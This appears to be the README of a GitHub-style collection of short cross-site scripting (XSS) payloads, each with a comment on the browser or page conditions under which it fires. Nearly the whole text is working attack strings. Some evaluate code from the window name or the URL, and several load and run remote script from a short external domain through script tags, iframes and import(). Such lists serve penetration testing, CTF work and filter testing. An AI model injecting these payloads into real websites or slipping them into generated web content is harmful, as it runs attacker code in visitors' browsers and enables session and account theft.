Tiny-XSS-Payloads
A collection of short XSS payloads that can be used in different contexts.
The DEMO available here: https://tinyxss.terjanq.me
Current Payloads
<!-- Only works as reflected XSS -->
<svg/onload=eval(name)>
<!-- If you control the URL -->
<svg/onload=eval(`'`+URL)>
<!-- If you control the name, but unsafe-eval not enabled -->
<svg/onload=location=name>
<!-- In chrome, also works inside innerHTML, even on elements not yet inserted into DOM -->
<svg><svg/onload=eval(name)>
<!-- If you control window's name, this payload will work inside innerHTML, even on elements not yet inserted into the DOM -->
<audio/src/onerror=eval(name)>
<!-- If you control the URL, this payload will work inside innerHTML, even on elements not yet inserted into the DOM -->
<img/src/onerror=eval(`'`+URL)>
<!-- Just a casual script -->
<script/src=//Η.β¨></script>
<!-- If you control the name of the window -->
<iframe/onload=src=top.name>
<!-- If you control the URL -->
<iframe/onload=eval(`'`+URL)>
<!-- If number of iframes on the page is constant -->
<iframe/onload=src=top[0].name+/\Η.β¨?/>
<!-- for Firefox only -->
<iframe/srcdoc="<svg><script/href=//Η.β¨ />">
<!-- If number of iframes on the page is random -->
<iframe/onload=src=contentWindow.name+/\Η.β¨?/>
<!-- If unsafe-inline is disabled in CSP and external scripts allowed -->
<iframe/srcdoc="<script/src=//Η.β¨></script>">
<!-- If inline styles are allowed -->
<style/onload=eval(name)>
<!-- If inline styles are allowed and the URL can be controlled -->
<style/onload=eval(`'`+URL)>
<!-- If inline styles are blocked -->
<style/onerror=eval(name)>
<!-- Uses external script as import, doesn't work in innerHTML -->
<!-- The PoC only works on https and Chrome, because Η.β¨ checks for Sec-Fetch-Dest header -->
<svg/onload=import(/\\Η.β¨/)>
<!-- Uses external script as import, triggers if inline styles are allowed.
<!-- The PoC only works on https and Chrome, because Η.β¨ checks for Sec-Fetch-Dest header -->
<style/onload=import(/\\Η.β¨/)>
<!-- Uses external script as import -->
<!-- The PoC only works on https and Chrome, because Η.β¨ checks for Sec-Fetch-Dest header -->
<iframe/onload=import(/\\Η.β¨/)>
Deprecated:
<!-- If you control the URL, Safari-only -->
<iframe/onload=write(URL)>
<!-- If inline styles are allowed, Safari only -->
<style/onload=write(URL)>